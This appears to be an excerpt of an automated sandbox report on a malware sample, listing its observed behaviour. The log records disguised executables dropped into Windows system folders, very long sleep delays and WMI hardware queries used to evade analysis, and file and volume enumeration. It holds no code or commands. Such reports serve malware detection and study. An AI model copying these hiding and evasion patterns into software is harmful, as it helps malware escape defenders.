                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -598312s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -598031s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -597609s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -597343s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -597078s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -596924s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -596760s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -596484s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -596261s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -595937s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -595234s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -595074s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -594893s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8312Thread sleep time: -300000s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -594644s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -594453s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -594234s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -594031s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -593812s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -593590s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -593375s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -593046s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -592796s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -592218s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -591906s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -591734s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -591484s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -591274s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -590984s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -590830s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -590671s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -590531s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -590386s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -590254s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -590093s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -589910s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -589453s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -589280s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -589162s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -589042s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -588872s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -588757s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -588645s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -588515s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -588343s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -588171s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -588013s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -587880s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -587750s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -587640s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -587531s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -587421s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -587298s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -587137s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -586654s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -586528s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -586386s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -586231s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -586117s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -586000s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585890s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585774s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585656s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585546s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585436s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585324s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585214s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -585109s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -584902s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -584795s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -584678s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -584542s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -584349s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583946s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583822s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583707s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583564s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583437s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583327s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583209s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -583079s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582963s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582858s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582750s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582640s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582530s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582406s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582218s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -582041s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -581828s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -581225s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -580984s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -580871s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -580765s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -580619s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -580484s >= -30000s
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 9012Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 7460Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 4372Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exe TID: 8356Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe TID: 736Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 428Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 7072Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exe TID: 4092Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_00CCA69B
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_00CDC220
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CEB348 FindFirstFileExA,2_2_00CEB348
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405D74
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_0040699E FindFirstFileW,FindClose,3_2_0040699E
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_0040290B FindFirstFileW,3_2_0040290B
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D547710 FindFirstFileW,6_2_00007FF63D547710
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D54A0C0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,6_2_00007FF63D54A0C0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D549FA0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,6_2_00007FF63D549FA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C8A0C0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,7_2_00007FF728C8A0C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C87710 FindFirstFileW,7_2_00007FF728C87710
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C89FA0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,7_2_00007FF728C89FA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C8A0C0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,10_2_00007FF728C8A0C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C87710 FindFirstFileW,10_2_00007FF728C87710
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C89FA0 PathIsRootW,GetFileAttributesExW,FindFirstFileW,FindClose,10_2_00007FF728C89FA0
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDE6A3 VirtualQuery,GetSystemInfo,2_2_00CDE6A3
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files\Everything\Everything.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 30000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 600000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 599734
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 599359
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 3600000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 599000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 598656
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 598312
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 598031
